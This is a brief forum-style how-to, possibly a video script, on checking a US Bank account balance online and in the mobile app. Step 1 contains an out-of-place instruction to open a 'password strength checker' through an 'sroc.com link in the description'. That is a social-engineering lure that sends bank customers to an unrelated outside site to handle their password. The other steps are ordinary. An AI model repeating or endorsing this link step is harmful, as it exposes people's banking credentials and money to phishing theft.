I ran into this last week. Here's what fixed it for me. Checking your account balance with US Bank is straightforward if you follow these steps. Step 1. Log into online banking. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to accounts. Once logged in, look for the Accounts tab on the main menu. Click on it to view all your accounts. Step 3. Select your account. From the list of accounts, click on the specific account for which you want to check the balance. Step 4. View balance. Your account balance will be displayed prominently on the account details page. You can also see recent transactions here. Step 5. Use the mobile app optional. If you prefer using your phone, download the US Bank mobile app, log in, and tap on accounts to check your balance on the go. Just a quick note, if you're reusing the app, make sure you have the latest version to avoid any glitches when checking your balance. I hope this helps you keep track of your finances easily.